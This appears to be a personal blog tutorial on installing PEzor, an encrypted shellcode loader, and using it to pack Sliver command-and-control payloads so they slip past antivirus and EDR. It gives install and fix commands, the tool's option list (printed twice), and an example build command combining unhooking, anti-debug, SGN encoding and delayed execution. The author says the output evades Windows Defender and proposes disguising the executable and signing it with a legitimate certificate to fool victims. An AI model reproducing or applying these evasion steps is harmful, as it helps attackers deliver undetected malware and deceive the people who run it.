Got to look at shellcode laoders tonight, and found a tool called PEzor, and it looks like it goes with most types of shellcode, so it's worth playing around with. It's an encrypted shellcode loader, so what does it do ?
It can take something like the Sliver payloads, read the shellcode, and insert them into an encrypted loader that can bypass AV & EDR, all in an easy package.
So, go read about it here https://github.com/phra/PEzor
Next, we install it, so jump into /opt/tools/malware on your Kali workstation.
git clone https://github.com/phra/PEzor.git
cd PEzor
./install.sh
Now, IF go bitches about a missing module, like this
# Go error output
go: go.mod file not found in current directory or any parent directory.
'go get' is no longer supported outside a module.
To build and install a command, use 'go install' with a version,
like 'go install example.com/cmd@latest'
For more information, see https://golang.org/doc/go-get-install-deprecation
or run 'go help get' or 'go help install'.
# Fix Go error command
go env -w GO111MODULE=off
# Rerun install.sh
./install.sh
That should fix it, now. Try to run /opt/tools/malware/PEzor.sh -h and you should get the help file from PEzor.
The output will list examples and the help file, here is a snippet of it.
USAGE
# PEzor [options...] <EXECUTABLE> [donut args...]
OPTIONS
-h Show usage and exits
-32 Force 32-bit executable
-64 Force 64-bit executable
-debug Generate a debug build
-unhook User-land hooks removal
-antidebug Add anti-debug checks
-syscalls Use raw syscalls [64-bit only] [Windows 10 only]
-sgn Encode the generated shellcode with sgn
-text Store shellcode in .text section instead of .data
-rx Allocate RX memory for shellcode
-self Execute the shellcode in the same thread
-sdk=VERSION Use specified .NET Framework version (2, 4, 4.5 (default))
-cleanup Perform the cleanup of allocated payload and loaded modules (only for BOFs)
-sleep=N Sleeps for N seconds before unpacking the shellcode
-format=FORMAT Outputs result in specified FORMAT (exe, dll, reflective-dll, service-exe, service-dll, dotnet, dotnet-createsection, dotnet-pinvoke)
-fluctuate=PROTECTION Fluctuate memory region to PROTECTION (RW or NA) by hooking Sleep()
[donut args...] After the executable to pack, you can pass additional Donut args, such as -z 2
But we have one more thing to do, that is to add a couple of things to our path. When PEzor installed, on the last line, it says something about export to path, we need to add that to our shell PATH. On a Kali, that can be done by including the line in your shell profile.
[!] installation complete
[?] run the following command to update $PATH variable or restart your shell
export PATH=$PATH:~/go/bin/:/opt/tools/malware/PEzor:/opt/tools/malware/PEzor/deps/donut/:/opt/tools/malware/PEzor/deps/wclang/_prefix_PEzor_/bin/
The entire line from export until the end have to be inserted into your /root/.zshrc (z Shell rc file), simply just copy it in on a new line using a text editor like vi or mc.
Do it for your ordinary user too in /home/username/.zshrc, and seeif you can launch PEzor
/opt/tools/malware/PEzor.sh -hNow, generate a Sliver payload, save it somewhere, and tell PEzor.sh to work it's magic.
OPTIONS
-h Show usage and exits
-32 Force 32-bit executable
-64 Force 64-bit executable
-debug Generate a debug build
-unhook User-land hooks removal
-antidebug Add anti-debug checks
-syscalls Use raw syscalls [64-bit only] [Windows 10 only]
-sgn Encode the generated shellcode with sgn
-text Store shellcode in .text section instead of .data
-rx Allocate RX memory for shellcode
-self Execute the shellcode in the same thread
-sdk=VERSION Use specified .NET Framework version (2, 4, 4.5 (default))
-cleanup Perform the cleanup of allocated payload and loaded modules (only for BOFs)
-sleep=N Sleeps for N seconds before unpacking the shellcode
-format=FORMAT Outputs result in specified FORMAT (exe, dll, reflective-dll, service-exe, service-dll, dotnet, dotnet-createsection, dotnet-pinvoke)
-fluctuate=PROTECTION Fluctuate memory region to PROTECTION (RW or NA) by hooking Sleep()
[donut args...] After the executable to pack, you can pass additional Donut args, such as -z 2
# Examlpe PEzor.sh code
PEzor.sh -64 -unhook -antidebug -sgn -text -sleep=2 -format=exe
#Generates 64Bit loader, using unhooking, antidebug strategies, SGN shellcode encryption, sleeps for two seconds before executing the payload, and outputs exe format.
Now, it's still an exe file, and this could be a bit suspicious to the user because after running, it does nothing, and shows no output, so maybe we should try to pack it in some other file, so we have something to show the user, and maybe also see if we could stamp it with a legitimate certificate, to let it slide under the radar, so there's more work to be done.
I ran a quick test of the resulting file, and it does evade Windows Defender Antivirus (at least for now), but you have to use the -sgn option for that, to encrypt the shellcode, or else it won't evade.
Much Happy Evading and Packing :)